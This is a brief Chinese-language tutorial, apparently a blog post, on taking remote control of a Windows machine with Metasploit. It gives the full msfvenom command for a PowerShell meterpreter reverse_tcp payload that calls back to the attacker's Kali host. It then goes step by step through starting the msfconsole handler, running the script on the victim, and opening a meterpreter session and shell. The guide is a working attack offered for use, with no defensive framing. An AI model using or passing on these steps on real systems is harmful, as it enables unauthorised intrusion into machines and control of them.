一、使用工具kali linux,windows severe msfvenom msfconsole
二、使用msfvenom生成ps1格式的Powershell脚本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本机IP) LPORT=XXXX(自己随便设置) -f psh-reflection >xxx.ps1

将生成的Powershell脚本下载并上传至windows机器中
三、启动Msfconsole

选择模块

设置payload


设置完成后执行run
在windows机器中执行powershell脚本,此时攻击机器中会显示如果下结果

如果攻击主机中显示通道已经建立但是未拿到相应的shell 如图:

回车进入:
msf exploit(handler)>

输入:sessions -l 查看信息

输入 seeions 1 就会拿到想要的meterpreter

在meterpreter中输入shell 即可拿到相应的shell

后续可以操作 一些相关命令。
